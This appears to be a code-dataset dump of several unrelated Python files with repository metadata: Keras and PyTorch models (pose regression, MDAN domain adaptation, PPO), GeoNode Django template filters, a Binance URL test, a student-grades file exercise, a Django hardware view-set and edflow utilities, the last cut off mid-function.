warnings.filterwarnings('ignore')
# Define a function that builds and returns the final pose-estimation model.
def run():
    """Build a multi-branch regression model on a frozen VGG16 base.

    `ns` identical heads are built, their outputs merged by element-wise
    addition, and a final 14-unit Dense layer produces the output.  The
    untrained model is saved to disk and a freshly re-loaded copy is
    returned.
    """
    # Download the VGG16 base model (ImageNet weights, no classifier head).
    conv_base = VGG16(weights='imagenet', include_top=False, input_shape=(224, 224, 3))

    # Freeze the pretrained layers so only the new heads are trainable.
    for layer in conv_base.layers:
        layer.trainable = False

    def top_model():
        """One branch: a copy of the VGG16 base topped with a small
        conv/dense regression head producing 14//ns outputs."""
        # `ns` is bound later in run(), before any call (late binding).
        head = Sequential()
        head.add(Conv2D(64, (3, 3), activation='relu', padding='same',
                        input_shape=conv_base.output_shape[1:]))
        head.add(BatchNormalization())
        head.add(MaxPool2D(pool_size=(2, 2), strides=(1, 1)))
        head.add(Flatten())
        head.add(Dense(4096, activation='relu'))
        head.add(BatchNormalization())
        head.add(Dropout(0.5))
        head.add(Dense(14 // ns, activation='relu'))  # for ns=2 this is 7 outputs

        # Stack the (shared-weight) VGG16 layers under the new head.
        branch = Sequential()
        for layer in conv_base.layers:
            branch.add(layer)
        branch.add(head)
        return branch

    def create_model(n):
        """Merge *n* independent branches by element-wise addition."""
        # FIX: build the branches in a local list instead of injecting
        # model_1..model_n into globals(), which polluted the module
        # namespace on every call.
        branches = [top_model() for _ in range(n)]
        merged = add([branch.output for branch in branches])
        output = Dense(14, activation='relu', kernel_initializer='Ones')(merged)
        # NOTE(review): modern keras.Model spells this keyword `outputs=`;
        # `output=` only works on older Keras releases — confirm against
        # the pinned Keras version before changing.
        final_model = Model(inputs=conv_base.input, output=output)
        return final_model

    ns = 2
    model = create_model(ns)

    # Save an untrained copy, then reload it so the returned instance is
    # a fresh deserialized model (as in the original implementation).
    model.save('../Custom_Models/Keras_Model_H5/Untrained_Model.h5')
    print("Model is saved to '/Untrained_Model.h5'")
    # `tensorflow` is imported at module level; the original re-imported
    # it here redundantly.
    model = tensorflow.keras.models.load_model('../Custom_Models/Keras_Model_H5/Untrained_Model.h5')
    return model
def run2():
    """Build, save and reload a small dense classification network.

    Architecture: 14 input features -> Dense stack with batch-norm and
    dropout -> 2 sigmoid outputs.  The untrained model is written to disk
    and reloaded so the returned instance is a fresh copy.
    """
    model = Sequential()
    model.add(Dense(164, input_shape=[14], activation='relu',
                    kernel_regularizer='l2', kernel_initializer='TruncatedNormal'))
    model.add(Dense(164, activation='relu'))
    model.add(Dense(546 * 2, activation='relu'))
    model.add(BatchNormalization())
    model.add(Dropout(0.5))
    model.add(Dense(14, activation='relu', kernel_regularizer='l2'))
    model.add(BatchNormalization())
    model.add(Dense(2, activation='sigmoid'))

    # Save a copy of the untrained model, then reload it from disk.
    model.save('../Custom_Models/Keras_Model_H5/Untrained_Classification_Model.h5')
    print("Model is saved to '/Untrained_Classification_Model.h5'")
    # `tensorflow` is imported at module level; the original re-imported
    # it here redundantly.
    model = tensorflow.keras.models.load_model('../Custom_Models/Keras_Model_H5/Untrained_Classification_Model.h5')
return model | 45.957143 | 128 | 0.685421 | 417 | 3,217 | 5.153477 | 0.290168 | 0.067008 | 0.040949 | 0.040949 | 0.327594 | 0.272685 | 0.217776 | 0.180549 | 0.147976 | 0.084691 | 0 | 0.030338 | 0.200808 | 3,217 | 70 | 129 | 45.957143 | 0.805523 | 0.145477 | 0 | 0.220339 | 0 | 0 | 0.15365 | 0.104745 | 0 | 0 | 0 | 0 | 0 | 1 | 0.067797 | false | 0 | 0.152542 | 0 | 0.271186 | 0.033898 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf79ad59a70ac719097fc73bb371a6c0bcb6f953 | 1,719 | py | Python | rndt/templatetags/metadata_tags.py | pasing/geonode-rndt | 214a0d17d4b93ae22257550d209c27cad4885692 | [
"BSD-2-Clause"
] | null | null | null | rndt/templatetags/metadata_tags.py | pasing/geonode-rndt | 214a0d17d4b93ae22257550d209c27cad4885692 | [
"BSD-2-Clause"
] | 56 | 2021-01-19T10:06:06.000Z | 2021-09-10T15:31:47.000Z | rndt/templatetags/metadata_tags.py | pasing/geonode-rndt | 214a0d17d4b93ae22257550d209c27cad4885692 | [
"BSD-2-Clause"
] | 1 | 2022-03-20T11:18:01.000Z | 2022-03-20T11:18:01.000Z | from django import template
from django.core.validators import URLValidator
from geonode.base.models import Thesaurus, ThesaurusKeyword
from rndt.models import LayerRNDT
register = template.Library()
@register.filter
def get_thesaurus_about(thesaurus_id):
    """Return the ``about`` URI of the Thesaurus with the given id.

    Returns None when no such thesaurus exists. Uses a single query via
    ``first()`` instead of the original ``exists()`` + ``get()`` pair
    (two round trips to the database).
    """
    thesaurus = Thesaurus.objects.filter(id=thesaurus_id).first()
    return thesaurus.about if thesaurus is not None else None
@register.filter
def get_access_contraints_url(layer_id):
    """Return ``constraints_other`` for the layer's RNDT record, or None.

    Single query via ``first()`` instead of ``exists()`` + ``get()``.
    """
    rndt = LayerRNDT.objects.filter(layer_id=layer_id).first()
    return rndt.constraints_other if rndt is not None else None
@register.filter
def get_access_contraints_keyword(layer_id):
    """Return the ``alt_label`` of the ThesaurusKeyword whose ``about``
    matches the layer's ``constraints_other`` URL, or None.

    Each lookup is a single ``first()`` query instead of the original
    ``exists()`` + ``get()`` double query.
    """
    rndt = LayerRNDT.objects.filter(layer_id=layer_id).first()
    if rndt is not None:
        keyword = ThesaurusKeyword.objects.filter(about=rndt.constraints_other).first()
        if keyword is not None:
            return keyword.alt_label
    return None
@register.filter
def get_use_constraint_keyword(keyword_url):
    """Return the ``alt_label`` of the ThesaurusKeyword identified by
    ``keyword_url`` (its ``about`` field), or None if not found.

    Single query via ``first()`` instead of ``exists()`` + ``get()``.
    """
    keyword = ThesaurusKeyword.objects.filter(about=keyword_url).first()
    return keyword.alt_label if keyword is not None else None
@register.filter
def is_url(item):
    """Return True when *item* passes Django's URL validation."""
    try:
        validator = URLValidator()
        validator(item)
        return True
    except Exception:
        # Narrowed from a bare ``except:`` (which also swallowed
        # KeyboardInterrupt/SystemExit). Invalid URLs raise
        # ValidationError; non-string input may raise TypeError.
        return False
@register.filter
def get_spatial_resolution(layer_id):
    """Return the layer's spatial ``resolution``, or None if no RNDT
    record exists.

    Single query via ``first()`` instead of ``exists()`` + ``get()``.
    """
    rndt = LayerRNDT.objects.filter(layer_id=layer_id).first()
    return rndt.resolution if rndt is not None else None
@register.filter
def get_positional_accuracy(layer_id):
    """Return the layer's positional ``accuracy``, or None if no RNDT
    record exists.

    Single query via ``first()`` instead of ``exists()`` + ``get()``.
    """
    rndt = LayerRNDT.objects.filter(layer_id=layer_id).first()
    return rndt.accuracy if rndt is not None else None
| 27.285714 | 72 | 0.737056 | 222 | 1,719 | 5.518018 | 0.225225 | 0.091429 | 0.097143 | 0.097959 | 0.383673 | 0.383673 | 0.222041 | 0.222041 | 0.16 | 0.086531 | 0 | 0 | 0.169284 | 1,719 | 62 | 73 | 27.725806 | 0.857843 | 0 | 0 | 0.3125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.145833 | false | 0 | 0.083333 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf7af33b2f34f609cedf99fe7194592e05e7a33f | 3,563 | py | Python | cycada/models/MDAN.py | Luodian/MADAN | 7a2918da44f5203b72652bc4cba0e70057482114 | [
"MIT"
] | 150 | 2019-10-29T01:22:31.000Z | 2022-02-16T02:09:31.000Z | cycada/models/MDAN.py | pikachusocute/MADAN | 7a2918da44f5203b72652bc4cba0e70057482114 | [
"MIT"
] | 6 | 2020-01-05T16:56:51.000Z | 2021-10-13T03:25:05.000Z | cycada/models/MDAN.py | pikachusocute/MADAN | 7a2918da44f5203b72652bc4cba0e70057482114 | [
"MIT"
] | 23 | 2019-11-04T15:46:29.000Z | 2022-01-16T09:10:01.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import torch
import torch.nn as nn
import torch.nn.functional as F
logger = logging.getLogger(__name__)
class GradientReversalLayer(torch.autograd.Function):
    """
    Implement the gradient reversal layer for the convenience of domain adaptation neural network.
    The forward part is the identity function while the backward part is the negative function.
    """

    # NOTE(review): this uses the legacy (pre-0.4) autograd.Function API —
    # instance methods without a `ctx` argument. Modern PyTorch requires
    # @staticmethod forward/backward invoked via Function.apply; calling
    # instances directly (as MDANet does via `self.grls[i](x)`) only works
    # on old torch versions — confirm the pinned torch version.
    def forward(self, inputs):
        # Identity in the forward pass.
        return inputs

    def backward(self, grad_output):
        # Negate the incoming gradient so upstream feature layers are
        # trained adversarially against the domain classifier.
        grad_input = grad_output.clone()
        grad_input = -grad_input
        return grad_input
class MDANet(nn.Module):
    """
    Multi-layer perceptron with adversarial regularizer by domain classification.

    Two source domains (synthetic "syn" and "gta") plus one target domain.
    Inputs are pooled to 2x2, channel-reduced from 4096 to 512 and
    flattened, so the flattened per-sample size is 512 * 2 * 2 = 2048 and
    ``configs["input_dim"]`` must equal 2048 (enforced by the assert in
    ``forward``). The 4096-channel input presumably comes from an upstream
    feature extractor — confirm against the caller.
    """

    def __init__(self, configs):
        super(MDANet, self).__init__()
        # Reduce arbitrary spatial size to 2x2, then 4096 -> 512 channels.
        self.pooling_layer = nn.AdaptiveAvgPool2d((2, 2))
        self.dim_reduction = nn.Conv2d(4096, 512, kernel_size=1)
        nn.init.xavier_normal_(self.dim_reduction.weight)
        nn.init.constant_(self.dim_reduction.bias, 0.1)
        self.input_dim = configs["input_dim"]
        self.num_hidden_layers = len(configs["hidden_layers"])
        # Layer sizes: [input_dim, hidden_1, ..., hidden_k].
        self.num_neurons = [] + [self.input_dim] + configs["hidden_layers"]
        self.num_domains = configs["num_domains"]
        # Parameters of hidden, fully-connected layers, feature learning component.
        self.hiddens = nn.ModuleList([nn.Linear(self.num_neurons[i], self.num_neurons[i + 1])
                                      for i in range(self.num_hidden_layers)])
        # Parameter of the final softmax classification layer.
        self.softmax = nn.Linear(self.num_neurons[-1], configs["num_classes"])
        # Parameter of the domain classification layer, multiple sources single target domain adaptation.
        self.domains = nn.ModuleList([nn.Linear(self.num_neurons[-1], 2) for _ in range(self.num_domains)])
        # Gradient reversal layer (one per domain).
        # NOTE(review): plain list, not ModuleList — fine, since the legacy
        # Functions hold no parameters.
        self.grls = [GradientReversalLayer() for _ in range(self.num_domains)]

    def forward(self, sinputs_syn, sinputs_gta, tinputs):
        """
        :param sinputs_syn: Features from the "syn" source domain.
        :param sinputs_gta: Features from the "gta" source domain.
        :param tinputs: Input from the target domain.
        :return: (class log-probs per source, source-domain log-probs,
                  target-domain log-probs), each a list over domains.
        """
        # Shared pooling + channel reduction for all three streams.
        sinputs_gta = self.pooling_layer(sinputs_gta)
        sinputs_syn = self.pooling_layer(sinputs_syn)
        tinputs = self.pooling_layer(tinputs)

        sinputs_gta = self.dim_reduction(sinputs_gta)
        sinputs_syn = self.dim_reduction(sinputs_syn)
        tinputs = self.dim_reduction(tinputs)

        # Flatten each stream to (batch, 512 * 2 * 2).
        b = sinputs_gta.size()[0]
        syn_relu, gta_relu, th_relu = sinputs_syn.view(b, -1), sinputs_gta.view(b, -1), tinputs.view(b, -1)
        assert (syn_relu[0].size()[0] == self.input_dim)

        # Shared MLP feature extractor applied to every stream.
        for hidden in self.hiddens:
            syn_relu = F.relu(hidden(syn_relu))
            gta_relu = F.relu(hidden(gta_relu))
        for hidden in self.hiddens:
            th_relu = F.relu(hidden(th_relu))

        # Classification probabilities on k source domains.
        logprobs = []
        logprobs.append(F.log_softmax(self.softmax(syn_relu), dim=1))
        logprobs.append(F.log_softmax(self.softmax(gta_relu), dim=1))

        # Domain classification accuracies. Gradients are reversed through
        # self.grls so the feature extractor learns domain-invariant features.
        sdomains, tdomains = [], []
        sdomains.append(F.log_softmax(self.domains[0](self.grls[0](syn_relu)), dim=1))
        tdomains.append(F.log_softmax(self.domains[0](self.grls[0](th_relu)), dim=1))
        sdomains.append(F.log_softmax(self.domains[1](self.grls[1](gta_relu)), dim=1))
        tdomains.append(F.log_softmax(self.domains[1](self.grls[1](th_relu)), dim=1))
        return logprobs, sdomains, tdomains

    def inference(self, inputs):
        # Classification only; expects already-flattened features of size
        # input_dim (no pooling/dim-reduction here, unlike forward).
        h_relu = inputs
        for hidden in self.hiddens:
            h_relu = F.relu(hidden(h_relu))
        # Classification probability.
        logprobs = F.log_softmax(self.softmax(h_relu), dim=1)
        return logprobs
| 35.277228 | 101 | 0.727196 | 518 | 3,563 | 4.820463 | 0.250965 | 0.028034 | 0.030837 | 0.04205 | 0.257909 | 0.164998 | 0.136163 | 0.073688 | 0.073688 | 0.073688 | 0 | 0.013175 | 0.147909 | 3,563 | 100 | 102 | 35.63 | 0.809289 | 0.221162 | 0 | 0.051724 | 0 | 0 | 0.020864 | 0 | 0 | 0 | 0 | 0 | 0.017241 | 1 | 0.086207 | false | 0 | 0.068966 | 0.017241 | 0.258621 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf7f1d14fd8adbed3cf841350eb294961b1fa9c9 | 776 | py | Python | test/hummingbot/connector/exchange/binance/test_binance_web_utils.py | pecuniafinance/hummingbot | 2cbb19c187a429d3e6000dc938617ca2a1f9f357 | [
"Apache-2.0"
] | 542 | 2021-12-17T22:34:31.000Z | 2022-03-31T14:36:23.000Z | test/hummingbot/connector/exchange/binance/test_binance_web_utils.py | pecuniafinance/hummingbot | 2cbb19c187a429d3e6000dc938617ca2a1f9f357 | [
"Apache-2.0"
] | 291 | 2021-12-17T20:07:53.000Z | 2022-03-31T11:07:23.000Z | test/hummingbot/connector/exchange/binance/test_binance_web_utils.py | pecuniafinance/hummingbot | 2cbb19c187a429d3e6000dc938617ca2a1f9f357 | [
"Apache-2.0"
] | 220 | 2021-12-17T12:41:23.000Z | 2022-03-31T23:03:22.000Z | import unittest
import hummingbot.connector.exchange.binance.binance_constants as CONSTANTS
from hummingbot.connector.exchange.binance import binance_web_utils as web_utils
class BinanceUtilTestCases(unittest.TestCase):
    """Unit tests for the Binance REST URL helper functions."""

    def test_public_rest_url(self):
        # public_rest_url = REST_URL (domain-formatted) + public version + path
        path_url = "/TEST_PATH"
        domain = "com"
        expected_url = CONSTANTS.REST_URL.format(domain) + CONSTANTS.PUBLIC_API_VERSION + path_url
        actual_url = web_utils.public_rest_url(path_url, domain)
        self.assertEqual(expected_url, actual_url)

    def test_private_rest_url(self):
        # private_rest_url = REST_URL (domain-formatted) + private version + path
        path_url = "/TEST_PATH"
        domain = "com"
        expected_url = CONSTANTS.REST_URL.format(domain) + CONSTANTS.PRIVATE_API_VERSION + path_url
        actual_url = web_utils.private_rest_url(path_url, domain)
        self.assertEqual(expected_url, actual_url)
| 38.8 | 99 | 0.755155 | 101 | 776 | 5.465347 | 0.287129 | 0.076087 | 0.097826 | 0.123188 | 0.557971 | 0.485507 | 0.485507 | 0.485507 | 0.485507 | 0.485507 | 0 | 0 | 0.16366 | 776 | 19 | 100 | 40.842105 | 0.850539 | 0 | 0 | 0.285714 | 0 | 0 | 0.033505 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf7fc8a8b957b2b7bbdc53ff35693ae32e07145b | 1,915 | py | Python | stepik/python67/03_04_04.py | ornichola/learning-new | e567218d8887805e38b1361715d5e3bd51a6bcaf | [
"Unlicense"
] | 2 | 2019-05-24T20:10:16.000Z | 2020-07-11T06:06:43.000Z | stepik/python67/03_04_04.py | ornichola/learning-new | e567218d8887805e38b1361715d5e3bd51a6bcaf | [
"Unlicense"
] | null | null | null | stepik/python67/03_04_04.py | ornichola/learning-new | e567218d8887805e38b1361715d5e3bd51a6bcaf | [
"Unlicense"
] | 21 | 2019-03-11T20:25:05.000Z | 2022-02-28T13:53:10.000Z | #[STEPIK]
# Программирование на Python https://stepik.org/67
# 03_04_04 Файловый ввод/вывод
'''
Имеется файл с данными по успеваемости абитуриентов. Он представляет из себя набор строк, где в каждой строке записана следующая информация:
Фамилия;Оценка_по_математике;Оценка_по_физике;Оценка_по_русскому_языку
Поля внутри строки разделены точкой с запятой, оценки — целые числа.
Напишите программу, которая считывает файл с подобной структурой и для каждого абитуриента выводит его среднюю оценку по этим трём предметам на отдельной строке, соответствующей этому абитуриенту.
Также в конце файла, на отдельной строке, через пробел запишите средние баллы по математике, физике и русскому языку по всем абитуриентам:
Примечание. Для разбиения строки на части по символу ';' можно использовать метод split следующим образом:
print('First;Second-1 Second-2;Third'.split(';'))
# ['First', 'Second-1 Second-2', 'Third']
Sample Input:
Петров;85;92;78
Сидоров;100;88;94
Иванов;58;72;85
Sample Output:
85.0
94.0
71.666666667
81.0 84.0 85.666666667
'''
# Read one "Surname;math;physics;russian" record per line, remember each
# student's average and the per-subject marks.
averages = []
marks_math = []
marks_phys = []
marks_rus = []

with open('03_04_04_input.txt') as in_f_obj:
    for line in in_f_obj:
        fields = line.rstrip().split(';')
        # Marks are integers in columns 1..3 (column 0 is the surname).
        math_mark = int(fields[1])
        phys_mark = int(fields[2])
        rus_mark = int(fields[3])
        averages.append((math_mark + phys_mark + rus_mark) / 3)
        marks_math.append(math_mark)
        marks_phys.append(phys_mark)
        marks_rus.append(rus_mark)

counter = len(averages)

with open('03_04_04_output.txt', 'w') as out_f_obj:
    # One average per student, one per line.
    for student_average in averages:
        out_f_obj.write(str(student_average) + '\n')
    # Final line: mean mark per subject, space-separated (no trailing
    # newline, matching the original output). sum() replaces the three
    # manual accumulator loops; marks are already ints, so the redundant
    # int() re-conversions are gone.
    average_math = sum(marks_math) / counter
    average_phys = sum(marks_phys) / counter
    average_rus = sum(marks_rus) / counter
    out_f_obj.write(str(average_math) + ' ' + str(average_phys) + ' ' + str(average_rus))
bf80a6ed202974e61e0995b343b524e3bec0665a | 1,921 | py | Python | baselines/PPO/src/model.py | dg10mcdos/mario-bmstew | 5b1806fc59dc88fd326a4e1de9c02284ba35f9f9 | [
"BSD-3-Clause"
] | null | null | null | baselines/PPO/src/model.py | dg10mcdos/mario-bmstew | 5b1806fc59dc88fd326a4e1de9c02284ba35f9f9 | [
"BSD-3-Clause"
] | null | null | null | baselines/PPO/src/model.py | dg10mcdos/mario-bmstew | 5b1806fc59dc88fd326a4e1de9c02284ba35f9f9 | [
"BSD-3-Clause"
] | null | null | null | """
@author: Viet Nguyen <nhviet1009@gmail.com>
"""
import torch.nn as nn
import torch.nn.functional as F
class PPO(nn.Module):
    """Actor-critic network for PPO on stacked 84x84 observations.

    Four stride-2 convolutions shrink a (B, num_inputs, 84, 84) input to
    (B, 32, 6, 6); a fully-connected layer maps the flattened features to
    512 units, from which the actor head emits ``num_actions`` logits and
    the critic head a single state value.
    """

    def __init__(self, num_inputs, num_actions):
        super(PPO, self).__init__()
        # Keep the construction order stable: it determines both the
        # module iteration order and the RNG draws during init.
        self.conv1 = nn.Conv2d(num_inputs, 32, 3, stride=2, padding=1)
        self.conv2 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
        self.conv3 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
        self.conv4 = nn.Conv2d(32, 32, 3, stride=2, padding=1)
        self.linear = nn.Linear(32 * 6 * 6, 512)
        self.critic_linear = nn.Linear(512, 1)
        self.actor_linear = nn.Linear(512, num_actions)
        self._initialize_weights()

    def _initialize_weights(self):
        # ReLU-gain orthogonal init for every conv/linear weight, zero biases.
        for module in self.modules():
            if isinstance(module, (nn.Conv2d, nn.Linear)):
                nn.init.orthogonal_(module.weight, nn.init.calculate_gain('relu'))
                nn.init.constant_(module.bias, 0)

    def forward(self, x):
        """Return ``(actor_logits, critic_value)`` for observations ``x``."""
        # (B, C, 84, 84) -> 42 -> 21 -> 11 -> (B, 32, 6, 6)
        for conv in (self.conv1, self.conv2, self.conv3, self.conv4):
            x = F.relu(conv(x))
        # Flatten and project to the shared 512-d representation.
        x = self.linear(x.view(x.size(0), -1))
        return self.actor_linear(x), self.critic_linear(x)
| 42.688889 | 129 | 0.5924 | 302 | 1,921 | 3.668874 | 0.298013 | 0.01083 | 0.032491 | 0.036101 | 0.192238 | 0.124549 | 0.086643 | 0.086643 | 0.086643 | 0.086643 | 0 | 0.094233 | 0.259761 | 1,921 | 44 | 130 | 43.659091 | 0.684951 | 0.320666 | 0 | 0 | 0 | 0 | 0.003123 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.12 | false | 0 | 0.08 | 0 | 0.28 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf815a5689f21b9f61269d3af287f2332400836a | 2,423 | py | Python | ufdl-core-app/src/ufdl/core_app/views/mixins/_GetHardwareGenerationViewSet.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | ufdl-core-app/src/ufdl/core_app/views/mixins/_GetHardwareGenerationViewSet.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | 85 | 2020-07-24T00:04:28.000Z | 2022-02-10T10:35:15.000Z | ufdl-core-app/src/ufdl/core_app/views/mixins/_GetHardwareGenerationViewSet.py | waikato-ufdl/ufdl-backend | 776fc906c61eba6c2f2e6324758e7b8a323e30d7 | [
"Apache-2.0"
] | null | null | null | from typing import List, NoReturn
from rest_framework import routers
from rest_framework.request import Request
from rest_framework.response import Response
from ...exceptions import BadArgumentValue
from ...models.nodes import Hardware
from ...serialisers.nodes import HardwareSerialiser
from ._RoutedViewSet import RoutedViewSet
class GetHardwareGenerationViewSet(RoutedViewSet):
    """
    Mixin for the hardware view-set which adds the ability to
    get the name of a hardware generation from the compute
    capability.
    """
    # The keyword used to specify when the view-set is in get-hardware-generation mode
    MODE_KEYWORD: str = "get-hardware-generation"

    @classmethod
    def get_routes(cls) -> List[routers.Route]:
        return [
            routers.Route(
                url=r'^{prefix}/get-hardware-generation/(?P<compute>.+){trailing_slash}$',
                mapping={'get': 'get_hardware_generation'},
                name='{basename}-get-hardware-generation',
                detail=False,
                initkwargs={cls.MODE_ARGUMENT_NAME: GetHardwareGenerationViewSet.MODE_KEYWORD}
            )
        ]

    def get_hardware_generation(self, request: Request, compute=None):
        """
        Action to get the hardware generation for a given level
        of compute capability.

        :param request: The request.
        :param compute: The level of compute capability.
        :return: The response containing the hardware generation.
        """
        # Attempt to parse the compute level. TypeError covers the
        # compute=None default, which float() would otherwise turn into
        # an unhandled 500 error.
        try:
            capability = float(compute)
        except (TypeError, ValueError):
            self._bad_argument(compute)

        # Get the hardware generation that corresponds to the compute level
        generation = Hardware.objects.for_compute_capability(capability)

        # If none do, raise an error
        if generation is None:
            self._bad_argument(compute)

        return Response(HardwareSerialiser().to_representation(generation))

    def _bad_argument(self, compute: str) -> NoReturn:
        """
        Handles the case when the compute value is not valid.

        :param compute: The compute value.
        """
        # Get the allowed range of compute values (renamed so the min/max
        # builtins are not shadowed).
        min_compute, max_compute = Hardware.objects.get_full_compute_range()

        # Raise a bad-argument error
        raise BadArgumentValue(self.action, "compute", compute, f"[{min_compute}, {max_compute})")
| 35.115942 | 94 | 0.658275 | 270 | 2,423 | 5.811111 | 0.362963 | 0.10325 | 0.080306 | 0.030593 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.262897 | 2,423 | 68 | 95 | 35.632353 | 0.878499 | 0.294676 | 0 | 0.060606 | 0 | 0 | 0.10665 | 0.091593 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090909 | false | 0 | 0.242424 | 0.030303 | 0.454545 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
bf82e91afdcb5e0fddbe0747375ddf3b811c5754 | 10,575 | py | Python | edflow/util.py | rromb/edflow | 8681cadf1770ca1bc1515535768dc14cb0758b0f | [
"MIT"
] | 2 | 2021-03-10T13:42:12.000Z | 2021-03-10T14:29:53.000Z | edflow/util.py | rromb/edflow | 8681cadf1770ca1bc1515535768dc14cb0758b0f | [
"MIT"
] | null | null | null | edflow/util.py | rromb/edflow | 8681cadf1770ca1bc1515535768dc14cb0758b0f | [
"MIT"
] | null | null | null | """Some Utility functions, that make yur life easier but don't fit in any
better catorgory than util."""
import numpy as np
import os
import pickle
def linear_var(step, start, end, start_value, end_value, clip_min=0.0, clip_max=1.0):
r"""Linear from :math:`(a, \alpha)` to :math:`(b, \beta)`, i.e.
:math:`y = (\beta - \alpha)/(b - a) * (x - a) + \alpha`
Args:
step (float): :math:`x`
start: :math:`a`
end: :math:`b`
start_value: :math:`\alpha`
end_value: :math:`\beta`
clip_min: Minimal value returned.
clip_max: Maximum value returned.
Returns:
float: :math:`y`
"""
linear = (end_value - start_value) / (end - start) * (
float(step) - start
) + start_value
return float(np.clip(linear, clip_min, clip_max))
def walk(dict_or_list, fn, inplace=False, pass_key=False, prev_key=""):  # noqa
    """Recursively walk a nested list/dict and apply ``fn`` at every leaf
    (any value that is neither a list nor a dict).

    Args:
        dict_or_list (dict or list): Possibly nested list or dictionary.
        fn (Callable): Applied to each leaf of the nested structure.
        inplace (bool): If True the leaves of ``dict_or_list`` are replaced
            by the results of ``fn``; otherwise a new structure is built.
        pass_key (bool): Also pass the accumulated, path-like key of the
            leaf to ``fn`` as first argument.
        prev_key (str): Key prefix accumulated from parent containers when
            ``pass_key`` is True.

    Returns:
        dict or list: Structure mirroring the input with ``fn`` applied at
        the leaves (the input itself is also mutated when ``inplace``).
    """

    def visit(key, value):
        # Recurse into containers; apply fn at leaves.
        if pass_key:
            full_key = os.path.join(prev_key, key)
            if isinstance(value, (list, dict)):
                return walk(value, fn, inplace, pass_key=True, prev_key=full_key)
            return fn(full_key, value)
        if isinstance(value, (list, dict)):
            return walk(value, fn, inplace)
        return fn(value)

    if isinstance(dict_or_list, list):
        results = []
        for index, item in enumerate(dict_or_list):
            outcome = visit(str(index), item)
            results.append(outcome)
            if inplace:
                dict_or_list[index] = outcome
    elif isinstance(dict_or_list, dict):
        results = {}
        for key, item in dict_or_list.items():
            outcome = visit(key, item)
            results[key] = outcome
            if inplace:
                dict_or_list[key] = outcome
    else:
        # Top-level leaf: apply fn directly.
        results = fn(prev_key, dict_or_list) if pass_key else fn(dict_or_list)
    return results
def retrieve(key, list_or_dict, splitval="/"):
    """Resolve a path-like ``key`` inside a nested list/dict.

    Args:
        key (str): ``key/to/value`` — the keys (or list indices) to follow,
            joined by ``splitval``.
        list_or_dict (list or dict): Possibly nested list or dictionary.
        splitval (str): Delimiter between the individual keys in ``key``.

    Returns:
        The value found at the end of the path.
    """
    parts = key.split(splitval)
    visited = []
    try:
        node = list_or_dict
        for part in parts:
            # Dicts are indexed by the raw key, lists by its int value.
            node = node[part] if isinstance(node, dict) else node[int(part)]
            visited.append(part)
    except Exception as e:
        # Report how far the traversal got before failing.
        print("Key not found: {}, seen: {}".format(parts, visited))
        raise e
    return node
def contains_key(nested_thing, key, splitval="/"):
    """Tests if the path like key can find an object in the nested_thing.

    Bug fix: the arguments to :func:`retrieve` were swapped
    (``retrieve(nested_thing, key, ...)``), so the lookup always raised and
    this function always returned False.
    """
    try:
        retrieve(key, nested_thing, splitval)
        return True
    except Exception:
        return False
def strenumerate(iterable):
    """Yield ``(index, value)`` pairs like :func:`enumerate`, with the
    index converted to a string.

    Args:
        iterable (Iterable): Any iterable object.
    """
    for index, value in enumerate(iterable):
        yield str(index), value
def cached_function(fn):
    """A very rough on-disk cache for function calls. Highly experimental.

    Only active when the environment variable ``EDFLOW_CACHED_FUNC`` is set
    to ``"42"``; otherwise ``fn`` is returned unchanged. Results are pickled
    to ``$HOME/var/edflow_cached_func``.

    Bug fix: the cache key used to be ``len(pickle.dumps(args))`` — the mere
    *length* of the pickled arguments — so different calls of the same
    length collided and returned each other's cached results. The key is
    now a SHA-1 digest of the pickled arguments.
    """
    # secret activation code
    if not os.environ.get("EDFLOW_CACHED_FUNC", 0) == "42":
        return fn

    import hashlib  # local import: only needed when caching is active

